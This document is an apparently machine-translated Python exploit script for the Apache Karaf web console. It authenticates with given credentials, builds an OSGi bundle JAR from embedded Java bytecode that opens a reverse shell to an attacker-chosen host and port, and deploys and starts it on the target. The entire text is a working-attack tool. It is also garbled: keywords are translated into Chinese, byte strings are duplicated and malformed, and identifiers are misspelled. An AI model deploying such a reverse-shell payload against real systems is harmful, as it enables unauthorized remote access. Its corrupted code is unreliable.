# - lhost=192.168.0.100 -lport=4444 \
#-Creds=KARAF:KARAF
'''
该工具将使您从系统打开反向外壳
那是在运行karaf console',
'''
导入argparse
导入基础64
导入IO
导入
导入Zipfile
导入请求
#subtest.mf文件的内容。
subest_content=\
'Bundle-name: RevShell \ n'\
'Bundle-Description:捆绑包打开反向外壳连接。\ n'\
'bundle-symbolicName: com.visionspace.osgi.revshell.activator \ n'\
'Bundle-vendor: visionspace \ n'\
'Bundle-version: 1.0.0 \ n'\
'import-package: org.osgi.framework \ n'\
'Bundle-Activator: com.visionspace.osgi.revshell.activator'
#activator.class字节码模板。
activator_class_bytecode_template=\
B'\ XCA \ XFE \ XBA \ XBE \ X00 \ X00 \ X00 \ X00 \ X37 \ X00 \ X00 \ X7B'\
B'\ x0a \ x00 \ x22 \ x00 \ x33 \ x08 \ x00 \ x34 \ x34 \ x07 \ x00'\ x00'\ x00'\
B'\ x35 \ x07 \ x00 \ x36 \ x0a \ x00 \ x03 \ x00 \ x00 \ x37 \ x37 \ x0a'\
B'\ x00 \ x03 \ x00 \ x38 \ x0a \ x00 \ x03 \ x00 \ x00 \ x39 \ x07'\
B'\ x00 \ x3a \ x08 \ x00 \ x3b \ x08 \ x00 \ x3c \ x3c \ x0a \ x00'\ x00'\ x00
B'\ x3d \ x00 \ x3e \ x0a \ x00 \ x08 \ x00 \ x3f \ x3f \ x0a \ x00'\ x00'\ x00'\
B'\ x2c \ x00 \ x40 \ x0a \ x00 \ x2c \ x00 \ x41 \ x41 \ x0a \ x00'\ x00'\ x00'\
B'\ x08 \ x00 \ x40 \ x0a \ x00 \ x2c \ x00 \ x42 \ x42 \ x0a \ x00'\ x00'\
B'\ x08 \ x00 \ x42 \ x0a \ x00 \ x08 \ x00 \ x00 \ x43 \ x0a \ x0a \ x00'\ x00'\
B'\ x2d \ x00 \ x44 \ x0a \ x00 \ x2d \ x00 \ x45 \ x45 \ x0a \ x00'\ x00'\ x00'\
B'\ x2e \ x00 \ x46 \ x0a \ x00 \ x2e \ x00 \ x00 \ x47 \ x05 \ x00 \ x00'\ x00'\
B'\ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x32 \ x0a \ x0a \ x00 \ x00 \ x48'\
B'\ x00 \ x49 \ x0a \ x00 \ x2c \ x00 \ x4a \ x4a \ x07 \ x00 \ x00 \ x4b'\
B'\ x0a \ x00 \ x2c \ x00 \ x4c \ x0a \ x00 \ x00 \ x08 \ x00 \ x00 \ x4d'\
B'\ x09 \ x00 \ x4e \ x00 \ x4f \ x08 \ x00 \ x50 \ x50 \ x0a \ x00'\ x00'\ x00'\
B'\ x51 \ x00 \ x52 \ x07 \ x00 \ x53 \ x53 \ x07 \ x00 \ x54 \ x54 \ x07'\ x07'\
B'\ x00 \ x55 \ x01 \ x00 \ x06 \ x3c \ x69 \ x6e \ x6e \ x69 \ x74'\ x69 \ x69 \ x74'\
B'\ x3e \ x01 \ x00 \ x03 \ x28 \ x29 \ x56 \ x56 \ x01 \ x00 \ x00 \ x04'\
B'\ x43 \ x6f \ x64 \ x65 \ x01 \ x00 \ x0f \ x4c \ x4c \ x69 \ x6e'\
B'\ x65 \ x4e \ x75 \ x6d \ x62 \ x65 \ x72 \ x72 \ x54 \ x61 \ x62'\ x61 \ x62'\
B'\ x6c \ x65 \ x01 \ x00 \ x05 \ x73 \ x74 \ x61 \ x61 \ x72 \ x74'\ x74'\
B'\ x01 \ x00 \ x25 \ x28 \ x4c \ x6f \ x72 \ x67 \ x67 \ x2f \ x6f'\ x6f'\
B'\ x73 \ x67 \ x69 \ x2f \ x66 \ x72 \ x61 \ x6d \ x6d \ x65 \ x65 \ x77'\ x77'\
B'\ x6f \ x72 \ x6b \ x2f \ x42 \ x75 \ x6e \ x64 \ x64 \ x6c \ x65'\
B'\ x43 \ x6f \ x6e \ x74 \ x65 \ x78 \ x74 \ x74 \ x3b \ x29 \ x56'\ x56'\
B'\ x01 \ x00 \ x0d \ x53 \ x74 \ x61 \ x63 \ x6b \ x6b \ x4d \ x61'\
B'\ x70 \ x54 \ x61 \ x62 \ x6c \ x65 \ x65 \ x07 \ x00 \ x56 \ x56 \ x07'\ x07'\
B'\ x00 \ x57 \ x07 \ x00 \ x58 \ x58 \ x07 \ x00 \ x59 \ x59 \ x01 \ x00'\ x00'\ x00'\
B'\ x0a \ x45 \ x78 \ x63 \ x65 \ x70 \ x74 \ x74 \ x69 \ x6f \ x6e'\ x6e'\
B'\ x73 \ x01 \ x00 \ x04 \ x73 \ x74 \ x6f \ x70 \ x70 \ x01 \ x00'\ x00'\ x00
B'\ x0a \ x53 \ x6f \ x75 \ x72 \ x63 \ x65 \ x65 \ x46 \ x69 \ x6c'\ x6c'\
B'\ x65 \ x01 \ x00 \ x0e \ x41 \ x63 \ x74 \ x69 \ x76 \ x76 \ x61'\
B'\ x74 \ x6f \ x72 \ x2e \ x6a \ x61 \ x76 \ x61 \ x61 \ x0c \ x00'\ x00'\
B'\ x24 \ x00 \ x25 \ x01 \ x00 \ x02 \ x73 \ x68 \ x68 \ x01 \ x00'\ x00'\ x00
B'\ x18 \ x6a \ x61 \ x76 \ x61 \ x2f \ x6c \ x61 \ x61 \ x61 \ x61 \ x6e \ x67'\
B'\ x2f \ x50 \ x72 \ x6f \ x63 \ x65 \ x73 \ x73 \ x73 \ x42 \ x42 \ x75'\
B'\ x69 \ x6c \ x64 \ x65 \ x72 \ x01 \ x00 \ x00 \ x10 \ x6a \ x61 \ x61'\
B'\ x76 \ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x53 \ x74'\ x74'\
B'\ x72 \ x69 \ x6e \ x67 \ x0c \ x00 \ x24 \ x00 \ x00 \ x5a \ x5a \ x0c'\
B'\ x00 \ x5b \ x00 \ x5c \ x0c \ x00 \ x28 \ x00 \ x00 \ x5d \ x5d \ x01'\
B'\ x00 \ x0f \ x6a \ x61 \ x76 \ x61 \ x2f \ x6e \ x65 \ x65 \ x74'\
B'\ x2f \ x53 \ x6f \ x63 \ x6b \ x65 \ x74 \ x01 \ x00 \ x00 \ x07'\
B'\ x3c \ x4c \ x48 \ x4f \ x53 \ x54 \ x3e \ x01 \ x01 \ x00 \ x07'\ x07'\
B'\ x3c \ x4c \ x50 \ x4f \ x52 \ x54 \ x3e \ x07 \ x00 \ x00 \ x5e'\ x5e'\
B'\ x0c \ x00 \ x5f \ x00 \ x60 \ x0c \ x00 \ x24 \ x24 \ x00 \ x00 \ x61'\
B'\ x0c \ x00 \ x62 \ x00 \ x63 \ x0c \ x00 \ x64 \ x64 \ x00 \ x63'\ x63'\
B'\ x0c \ x00 \ x65 \ x00 \ x66 \ x0c \ x00 \ x67 \ x67 \ x00 \ x00 \ x68'\
B'\ x0c \ x00 \ x69 \ x00 \ x6a \ x0c \ x00 \ x6b \ x6b \ x00 \ x6a'\ x6a'\
B'\ x0c \ x00 \ x6c \ x00 \ x6d \ x0c \ x00 \ x6e \ x6e \ x00 \ x00 \ x25'\
B'\ x07 \ x00 \ x6f \ x0c \ x00 \ x70 \ x00 \ x00 \ x71 \ x0c \ x0c \ x00'\ x00'\ x00
B'\ x72 \ x00 \ x6a \ x01 \ x00 \ x13 \ x6a \ x61 \ x61 \ x76 \ x61'\ x61'\
B'\ x2f \ x6c \ x61 \ x6e \ x67 \ x2f \ x45 \ x78 \ x78 \ x63 \ x65'\
B'\ x70 \ x74 \ x69 \ x6f \ x6e \ x0c \ x00 \ x73 \ x00 \ x00 \ x25'\ x25'\
B'\ x0c \ x00 \ x74 \ x00 \ x25 \ x07 \ x00 \ x00 \ x75 \ x0c \ x00 \ x00'\ x00'\ x00
B'\ x76 \ x00 \ x77 \ x01 \ x00 \ x1d \ x54 \ x54 \ x68 \ x61 \ x61 \ x6e'\ x61
B'\ x6b \ x20 \ x79 \ x6f \ x75 \ x20 \ x66 \ x6f \ x6f \ x72 \ x20'\ x20'\
B'\ x70 \ x77 \ x6e \ x69 \ x6e \ x67 \ x20 \ x77 \ x77 \ x69 \ x74'\
B'\ x68 \ x20 \ x75 \ x73 \ x21 \ x07 \ x00 \ x00 \ x78 \ x0c \ x00'\ x00'\
B'\ x79 \ x00 \ x7a \ x01 \ x00 \ x27 \ x63 \ x6f \ x6f \ x6d \ x6d \ x2f'\
B'\ x76 \ x69 \ x73 \ x69 \ x6f \ x6e \ x73 \ x70 \ x70 \ x61 \ x63'\ x63'\
B'\ x65 \ x2f \ x6f \ x73 \ x67 \ x69 \ x2f \ x72 \ x65 \ x65 \ x76'\ x76'\
B'\ x73 \ x68 \ x65 \ x6c \ x6c \ x2f \ x41 \ x63 \ x63 \ x74 \ x69'\
B'\ x76 \ x61 \ x74 \ x6f \ x72 \ x01 \ x00 \ x00 \ x10 \ x6a \ x61'\ x61'\
B'\ x76 \ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x4f \ x4f \ x62'\ x62'\ x62
B'\ x6a \ x65 \ x63 \ x74 \ x01 \ x00 \ x22 \ x6f \ x6f \ x72 \ x67'\ x67'\
B'\ x2f \ x6f \ x73 \ x67 \ x69 \ x2f \ x66 \ x72 \ x72 \ x61 \ x6d'\ x61
B'\ x65 \ x77 \ x6f \ x72 \ x6b \ x2f \ x42 \ x75 \ x75 \ x6e \ x64'\
B'\ x6c \ x65 \ x41 \ x63 \ x74 \ x69 \ x76 \ x61 \ x61 \ x74 \ x6f'\ x6f'\
B'\ x72 \ x01 \ x00 \ x20 \ x6f \ x72 \ x67 \ x2f \ x6f \ x6f \ x73'\ x73'\
B'\ x67 \ x69 \ x2f \ x66 \ x72 \ x61 \ x6d \ x65 \ x65 \ x77 \ x77 \ x6f'\ x6f'\
B'\ x72 \ x6b \ x2f \ x42 \ x75 \ x6e \ x64 \ x6c \ x6c \ x65 \ x43'\ x43'\
B'\ x6f \ x6e \ x74 \ x65 \ x78 \ x74 \ x01 \ x00 \ x00 \ x11 \ x6a'\ x6a'\
B'\ x61 \ x76 \ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x50'\ x50'\
B'\ x72 \ x6f \ x63 \ x65 \ x73 \ x73 \ x73 \ x01 \ x00 \ x13 \ x13 \ x6a'\
B'\ x61 \ x76 \ x61 \ x2f \ x69 \ x6f \ x2f \ x2f \ x49 \ x6e \ x70'\ x70'\
B'\ x75 \ x74 \ x53 \ x74 \ x72 \ x65 \ x61 \ x61 \ x6d \ x01 \ x00'\ x00'\ x00
B'\ x14 \ x6a \ x61 \ x76 \ x61 \ x2f \ x69 \ x6f \ x6f \ x2f \ x2f \ x4f'\
B'\ x75 \ x74 \ x70 \ x75 \ x74 \ x53 \ x74 \ x72 \ x72 \ x65 \ x61'\ x61'\
B'\ x6d \ x01 \ x00 \ x16 \ x28 \ x5b \ x4c \ x6a \ x6a \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x53 \ x74 \ x72'\ x74 \ x72'\
B'\ x69 \ x6e \ x67 \ x3b \ x29 \ x56 \ x01 \ x00 \ x00 \ x13 \ x72'\
B'\ x65 \ x64 \ x69 \ x72 \ x65 \ x63 \ x74 \ x45 \ x45 \ x72 \ x72'\ x72'\
B'\ x6f \ x72 \ x53 \ x74 \ x72 \ x65 \ x61 \ x61 \ x6d \ x01 \ x00'\ x00'\
B'\ x1d \ x28 \ x5a \ x29 \ x4c \ x6a \ x61 \ x76 \ x76 \ x61 \ x2f'\ x2f'\
B'\ x6c \ x61 \ x6e \ x67 \ x2f \ x50 \ x72 \ x6f \ x6f \ x63 \ x65'\ x63 \ x65'\
B'\ x73 \ x73 \ x42 \ x75 \ x69 \ x6c \ x64 \ x65 \ x65 \ x72 \ x3b'\
B'\ x01 \ x00 \ x15 \ x28 \ x29 \ x4c \ x6a \ x61 \ x61 \ x76 \ x61'\ x61 \ x61'\
B'\ x2f \ x6c \ x61 \ x6e \ x67 \ x2f \ x50 \ x72 \ x72 \ x6f \ x63'\ x63'\
B'\ x65 \ x73 \ x73 \ x3b \ x01 \ x00 \ x11 \ x6a \ x61 \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x67 \ x2f \ x49 \ x6e \ x6e \ x74'\ x74'\
B'\ x65 \ x67 \ x65 \ x72 \ x01 \ x00 \ x08 \ x70 \ x70 \ x61 \ x72'\ x72'\
B'\ x73 \ x65 \ x49 \ x6e \ x74 \ x01 \ x00 \ x15 \ x15 \ x28 \ x4c'\ x4c'\ x4c
B'\ x6a \ x61 \ x76 \ x61 \ x2f \ x6c \ x61 \ x61 \ x61 \ x6e \ x67 \ x67 \ x2f'\
B'\ x53 \ x74 \ x72 \ x69 \ x6e \ x67 \ x3b \ x3b \ x29 \ x49 \ x01'\ x01'\
B'\ x00 \ x16 \ x28 \ x4c \ x6a \ x61 \ x76 \ x61 \ x61 \ x2f \ x6c'\ x6c'\ x61
B'\ x61 \ x6e \ x67 \ x2f \ x53 \ x74 \ x72 \ x69 \ x69 \ x6e \ x67'\ x67'\
B'\ x3b \ x49 \ x29 \ x56 \ x01 \ x00 \ x0e \ x67 \ x67 \ x65 \ x74'\
B'\ x49 \ x6e \ x70 \ x75 \ x74 \ x53 \ x74 \ x72 \ x72 \ x65 \ x61'\ x61'\
B'\ x6d \ x01 \ x00 \ x17 \ x28 \ x29 \ x4c \ x6a \ x6a \ x61 \ x76'\
B'\ x61 \ x2f \ x69 \ x6f \ x2f \ x49 \ x6e \ x70 \ x70 \ x75 \ x74'\ x74'\
B'\ x53 \ x74 \ x72 \ x65 \ x61 \ x6d \ x6d \ x3b \ x01 \ x00 \ x00 \ x0e'\ x0e'\
B'\ x67 \ x65 \ x74 \ x45 \ x72 \ x72 \ x6f \ x6f \ x72 \ x53 \ x74'\ x74'\
B'\ x72 \ x65 \ x61 \ x6d \ x01 \ x00 \ x00 \ x0f \ x67 \ x65 \ x65 \ x74'\
B'\ x4f \ x75 \ x74 \ x70 \ x75 \ x74 \ x53 \ x74 \ x74 \ x72 \ x65'\ x65'\
B'\ x61 \ x6d \ x01 \ x00 \ x18 \ x28 \ x29 \ x4c \ x4c \ x6a \ x61'\
B'\ x76 \ x61 \ x2f \ x69 \ x6f \ x2f \ x2f \ x4f \ x75 \ x74 \ x74 \ x70'\ x70'\
B'\ x75 \ x74 \ x53 \ x74 \ x72 \ x65 \ x61 \ x6d \ x6d \ x3b \ x3b \ x01'\ x01'\
B'\ x00 \ x08 \ x69 \ x73 \ x43 \ x6c \ x6f \ x6f \ x73 \ x65 \ x65 \ x64'\
B'\ x01 \ x00 \ x03 \ x28 \ x29 \ x5a \ x01 \ x00 \ x00 \ x09 \ x61'\
B'\ x76 \ x61 \ x69 \ x6c \ x61 \ x62 \ x6c \ x6c \ x65 \ x65 \ x01 \ x00'\ x00'\
B'\ x03 \ x28 \ x29 \ x49 \ x01 \ x00 \ x04 \ x72 \ x72 \ x65 \ x61'\ x65 \ x61'\
B'\ x64 \ x01 \ x00 \ x05 \ x77 \ x72 \ x69 \ x74 \ x74 \ x65 \ x01'\ x01'\
B'\ x00 \ x04 \ x28 \ x49 \ x29 \ x56 \ x01 \ x00 \ x00 \ x05 \ x05 \ x66'\
B'\ x6c \ x75 \ x73 \ x68 \ x01 \ x00 \ x10 \ x6a \ x6a \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x6c \ x61 \ x6e \ x67 \ x2f \ x54 \ x54 \ x68 \ x72'\ x72'\
B'\ x65 \ x61 \ x64 \ x01 \ x00 \ x05 \ x73 \ x6c \ x6c \ x65 \ x65'\ x65 \ x65'\
B'\ x70 \ x01 \ x00 \ x04 \ x28 \ x4a \ x29 \ x56 \ x56 \ x01 \ x00'\ x00'\ x00
B'\ x09 \ x65 \ x78 \ x69 \ x74 \ x56 \ x61 \ x6c \ x6c \ x75 \ x65'\ x65 \ x65'\
B'\ x01 \ x00 \ x07 \ x64 \ x65 \ x73 \ x74 \ x72 \ x72 \ x6f \ x79'\ x79'\
B'\ x01 \ x00 \ x05 \ x63 \ x6c \ x6f \ x6f \ x73 \ x65 \ x65 \ x01 \ x00'\ x00'\ x00
B'\ x10 \ x6a \ x61 \ x76 \ x61 \ x2f \ x6c \ x6c \ x61 \ x61 \ x61 \ x6e \ x67'\ x67'\
B'\ x2f \ x53 \ x79 \ x73 \ x74 \ x65 \ x6d \ x6d \ x01 \ x00 \ x00 \ x03'\
B'\ x6f \ x75 \ x74 \ x01 \ x00 \ x15 \ x4c \ x4c \ x6a \ x61 \ x61 \ x76'\
B'\ x61 \ x2f \ x69 \ x6f \ x2f \ x2f \ x50 \ x72 \ x69 \ x6e \ x6e \ x74'\
B'\ x53 \ x74 \ x72 \ x65 \ x61 \ x6d \ x6d \ x3b \ x01 \ x00 \ x00 \ x13'\
B'\ x6a \ x61 \ x76 \ x61 \ x2f \ x69 \ x6f \ x6f \ x2f \ x50 \ x72'\ x72'\
B'\ x69 \ x6e \ x74 \ x53 \ x74 \ x72 \ x65 \ x61 \ x61 \ x6d \ x01'\
B'\ x00 \ x07 \ x70 \ x72 \ x69 \ x6e \ x74 \ x6c \ x6c \ x6e \ x01'\
B'\ x00 \ x15 \ x28 \ x4c \ x6a \ x61 \ x76 \ x61 \ x61 \ x2f \ x6c'\ x6c'\ x61
B'\ x61 \ x6e \ x67 \ x2f \ x53 \ x74 \ x72 \ x69 \ x69 \ x6e \ x67'\ x67'\
B'\ x3b \ x29 \ x56 \ x00 \ x21 \ x00 \ x21 \ x00 \ x00 \ x21 \ x21 \ x00 \ x22 \ x00'\ x00'\ x00
B'\ x01 \ x00 \ x23 \ x00 \ x00 \ x00 \ x00 \ x03 \ x00 \ x01 \ x01 \ x00'\ x00'\ x00
B'\ x24 \ x00 \ x25 \ x00 \ x01 \ x00 \ x26 \ x00 \ x00 \ x00 \ x00 \ x00'\ x00'\
B'\ x1d \ x00 \ x01 \ x00 \ x01 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x05 \ x2a'\ x2a'\
B'\ xb7 \ x00 \ x01 \ xb1 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x27'\ x27'\
B'\ x00 \ x00 \ x00 \ x06 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x0a'\
B'\ x00 \ x01 \ x00 \ x28 \ x00 \ x29 \ x00 \ x00 \ x02 \ x00 \ x00 \ x26'\
B'\ x00 \ x00 \ x01 \ x6e \ x00 \ x00 \ x06 \ x00 \ x0b \ x00 \ x00 \ x00'\ x00'\
B'\ x00 \ xb8 \ x12 \ x02 \ x4d \ xbb \ x00 \ x03 \ x59 \ x59 \ x04'\
B'\ xbd \ x00 \ x04 \ x59 \ x03 \ x2c \ x53 \ xb7 \ xb7 \ x00 \ x00 \ x05'\
B'\ x04 \ xb6 \ x00 \ x06 \ xb6 \ x00 \ x00 \ x07 \ x4e \ xbb \ xbb \ x00'\ x00'\
B'\ x08 \ x59 \ x12 \ x09 \ x12 \ x0a \ xb8 \ x00 \ x00 \ x0b \ xb7'\ xb7'\
B'\ x00 \ x0c \ x3a \ x04 \ x2d \ xb6 \ x00 \ x0d \ x0d \ x3a \ x05'\ x05'\
B'\ x2d \ xb6 \ x00 \ x0e \ x3a \ x06 \ x19 \ x04 \ x04 \ xb6 \ x00'\ x00'\
B'\ x0f \ x3a \ x07 \ x2d \ xb6 \ x00 \ x10 \ x3a \ x3a \ x08 \ x19'\ x19'\
B'\ x04 \ xb6 \ x00 \ x11 \ x3a \ x09 \ x19 \ x19 \ x04 \ xb6 \ x00'\ x00'\ x00'\
B'\ x12 \ x9a \ x00 \ x5f \ x19 \ x05 \ xb6 \ x00 \ x00 \ x13 \ x9e'\ x9e'\
B'\ x00 \ x10 \ x19 \ x09 \ x19 \ x05 \ xb6 \ x00 \ x00 \ x14 \ xb6'\ xb6'\
B'\ x00 \ x15 \ xa7 \ xff \ xee \ x19 \ x06 \ xb6 \ xb6 \ x00 \ x00 \ x13'\
B'\ X9E \ x00 \ x10 \ x19 \ x09 \ x19 \ x06 \ xb6 \ xb6 \ x00 \ x00 \ x14'\
B'\ xb6 \ x00 \ x15 \ xa7 \ xff \ xee \ x19 \ x07 \ xb6 \ xb6 \ x00'\ x00'\
B'\ x13 \ x9e \ x00 \ x10 \ x19 \ x08 \ x19 \ x07 \ xb6 \ xb6 \ x00'\ x00'\
B'\ x14 \ xb6 \ x00 \ x15 \ xa7 \ xff \ xee \ x19 \ x19 \ x09 \ xb6'\
B'\ x00 \ x16 \ x19 \ x08 \ xb6 \ x00 \ x16 \ x14 \ x14 \ x00 \ x00 \ x17'\ x17'\
B'\ xb8 \ x00 \ x19 \ x2d \ xb6 \ x00 \ x1a \ x57 \ x57 \ xa7 \ x00'\ x00'\
B'\ x08 \ x3a \ x0a \ xa7 \ xff \ x9f \ x2d \ xb6 \ xb6 \ x00 \ x1c'\ x1c'\
B'\ x19 \ x04 \ xb6 \ x00 \ x1d \ xb1 \ x00 \ x00 \ x01 \ x00 \ x00 \ xa1'\
B'\ x00 \ xa6 \ x00 \ xa9 \ x00 \ x1b \ x00 \ x02 \ x00 \ x00 \ x27'\ x27'\
B'\ x00 \ x00 \ x00 \ x66 \ x00 \ x19 \ x00 \ x00 \ x00 \ x00 \ x00 \ x0c'\
B'\ x00 \ x03 \ x00 \ x0e \ x00 \ x1a \ x00 \ x00 \ x0f \ x00 \ x00 \ x2a'\ x2a'\
B'\ x00 \ x10 \ x00 \ x30 \ x00 \ x11 \ x00 \ x36 \ x36 \ x00 \ x12'\ x12'\
B'\ x00 \ x3d \ x00 \ x13 \ x00 \ x43 \ x00 \ x14 \ x14 \ x00 \ x4a'\ x4a'\
B'\ x00 \ x15 \ x00 \ x52 \ x00 \ x16 \ x00 \ x5a \ x5a \ x00 \ x17'\ x17'\
B'\ x00 \ x67 \ x00 \ x18 \ x00 \ x6f \ x00 \ x19 \ x19 \ x00 \ x7c'\ x7c'\
B'\ x00 \ x1a \ x00 \ x84 \ x00 \ x1b \ x00 \ x91 \ x91 \ x00 \ x1c'\ x1c'\
B'\ x00 \ x96 \ x00 \ x1d \ x00 \ x9b \ x00 \ x1e \ x1e \ x00 \ xa1'\
B'\ x00 \ x20 \ x00 \ xa6 \ x00 \ x21 \ x00 \ xa9 \ x00 \ x00 \ x22'\ x22'\
B'\ x00 \ xab \ x00 \ x23 \ x00 \ xae \ x00 \ x25 \ x25 \ x00 \ xb2'\
B'\ x00 \ x26 \ x00 \ xb7 \ x00 \ x27 \ x00 \ x00 \ x2a \ x00 \ x00 \ x00 \ x00 \ x00'\ x00'\
B'\ x00 \ x30 \ x00 \ x07 \ xff \ x00 \ x4a \ x00 \ x00 \ x0a \ x07'\
B'\ x00 \ x21 \ x07 \ x00 \ x2b \ x07 \ x00 \ x04 \ x04 \ x07 \ x00'\ x00'\ x00'\
B'\ x2c \ x07 \ x00 \ x08 \ x07 \ x00 \ x2d \ x2d \ x07 \ x00 \ x00 \ x2d'\ x2d'\
B'\ x07 \ x00 \ x2d \ x07 \ x00 \ x2e \ x2e \ x07 \ x00 \ x2e \ x2e \ x07 \ x00 \ x00 \ x2e \ x2e \ x00'\ x00'\
B'\ x00 \ x07 \ x14 \ x14 \ x14 \ x14 \ x14 \ x57 \ x07 \ x00 \ x00 \ x1b \ x1b \ x04'\
B'\ x00 \ x2f \ x00 \ x00 \ x00 \ x00 \ x04 \ x00 \ x01 \ x00 \ x00 \ x1b'\
B'\ x00 \ x01 \ x00 \ x30 \ x00 \ x29 \ x00 \ x02 \ x00 \ x00 \ x26'\ x00 \ x00 \ x26'\
B'\ x00 \ x00 \ x00 \ x25 \ x00 \ x00 \ x02 \ x00 \ x02 \ x00 \ x00 \ x02 \ x00 \ x00 \ x00'\ x00'\ x00
B'\ x00 \ x09 \ xb2 \ x00 \ x1e \ x12 \ x1f \ x1f \ xb6 \ x00 \ x20'\ x20'\
B'\ xb1 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x27 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00'\ x00'\ x00'\
B'\ x0a \ x00 \ x02 \ x00 \ x00 \ x00 \ x00 \ x2a \ x00 \ x00 \ x00 \ x08 \ x00'\ x00'\ x00'\
B'\ x2b \ x00 \ x2f \ x00 \ x00 \ x00 \ x00 \ x04 \ x00 \ x01 \ x01 \ x00'\ x00'\
B'\ x1b \ x00 \ x01 \ x00 \ x31 \ x00 \ x00 \ x00 \ x00 \ x02 \ x00'\ x00'\ x00
B'\ x32'
#要替换的项目在Activator.class的字节码中
#lenlhost=\ x07 \ x3c \ x4c \ x48 \ x4f \ x53 \ x54 \ x3e
activator_class_lhost_tag=b'\ x07 \ x3c \ x4c \ x48 \ x4f \ x4f \ x53 \ x54 \ x54 \ x3e'
#lenlport=\ x07 \ x3c \ x4c \ x50 \ x4f \ x52 \ x54 \ x3e
activator_class_lport_tag=b'\ x07 \ x3c \ x4c \ x50 \ x4f \ x4f \ x52 \ x54 \ x3e'
DEF PARSE():
'''
此函数解析命令行参数。
'''
Parser=argparse.argumentparser(
prog='karaf-console-rce',
description='此工具将使您从'
“正在运行karaf控制台的系统”,
epilog='快乐黑客!)',
)
parser.add_argument(' - rhost',dest='rhost',
help='远程主机',type=str,必需=true)
parser.add_argument(' - rport',dest='rport',
help='远程端口',type=int,必需=true)
parser.add_argument(' - lhost',dest='lhost',
help='本地主机',type=str,必需=true)
parser.add_argument(' - lport',dest='lport',
help='本地端口',type=int,必需=true)
parser.add_argument(' - creds',dest='cords',
help='格式username
assword的凭据',type=str,必需=true)
parser.add_argument(' - 版本',action='版本',
版本='%(prog)s 0.1.0')
返回parser.parse_args()
def extract_jsessionid(cookie):
'''
此功能从cookie字符串中提取JSessionId。
'''
jsessionId=无
regex=re.findall('jsessionid=([^;]+)',cookie)
如果Len(Regex)0:
jsessionId=正则[0]
返回JSessionId
def Authenticate(target,basic_auth):
'''
此功能连接到URL并检索JSessionId
基于基本授权。
'''
jsessionId=无
标题={
“授权” : BASIC_AUTH
}
响应=requests.get(target,标头=标题,
laster_redirects=false,超时=10)
if(response.status_code==302 and wenspy.headers ['set-cookie']):
jsessionId=extract_jsessionId(response.headers ['set-cookie'])
返回JSessionId
Def Generate_Payload(LHOST,LPORT):
'''
此功能生成有效载荷。
它用“ lhost”和“ lport”参数代替了模板有效载荷。
'''
有效载荷=无
lhost_byte_array=bytearray()
lhost_byte_array.append(Len(lhost))
lhost_byte_array.extend(Map(ord,lhost))
activater_class_bytecodes=activator_class_bytecode_template.replace(
activator_class_lhost_tag,lhost_byte_array)
lport_str=str(lport)
lport_byte_array=bytearray()
lport_byte_array.append(len(lport_str))
lport_byte_array.extend(Map(ord,lport_str))
activater_class_bytecodes=activater_class_bytecodes.replace(
activator_class_lport_tag,lport_byte_array)
jar_bytes=io.bytesio()
用zipfile.zipfile(jar_bytes,'w',zipfile.zip_deflated)为zip_file:
zip_file.writester('com/visionspace/osgi/revshell/activator.class',
Activater_class_bytecodes)
zip_file.writester('meta-inf/subest.mf',subest_content)
有效载荷=jar_bytes.getValue()
退回有效载荷
Def Deploy_payload(target,basic_auth,jsessionId,有效载荷):
'''
此功能连接到KARAF控制台并部署有效载荷。
'''
成功=false
url=f'{target}/捆绑
cookies={
'jSessionId': jsessionId
}
标题={
“授权” : BASIC_AUTH
}
文件={
'Bundlefile':(
'revshell.jar',有效载荷,'application/x-java-archive')
}
数据={
'Action':'安装',
'Bundlestart':'开始',
'Bundlestartlevel': 80
}
响应=requests.post(url,标头=标题,cookies=cookie,
文件=文件,数据=数据,超时=10,
ally_redirects=false)
if stest.status_code==302:
成功=true
返回成功
def generate_basic_auth(Creds):
'''
此函数基于基本的授权字符串
在凭证上。
'''
creds_base64=base64.b64encode(creds.encode())。decode()
basic_auth=f'basic {creds_base64}'
返回basic_auth
def create_target_url(rhost,rport):
'''
此功能创建目标URL。
'''
target_url=f'http://{rhost} : {rport}/system/console'
返回target_url
def main(args):
'''
主要功能。
'''
target=create_target_url(args.rhost,args.rport)
打印('[*]登录.')
basic_auth=generate_basic_auth(args.creds)
jSessionId=authenticate(target,basic_auth)
如果JSessionID:
打印(建立'[+]会话。')
打印('[*]生成有效载荷.')
payload=generate_payload(args.lhost, args.lport)
如果有效:
打印('[*]部署有效载荷.')
如果Deploy_payload(target,basic_auth,jsessionid,有效载荷):
打印('[+]完成。')
其他:
打印('[ - ]无法部署有效载荷!')
其他:
打印('[ - ]无法生成有效载荷!')
其他:
打印('[ - ]登录失败!')
如果name=='__ -Main __':
主(parse())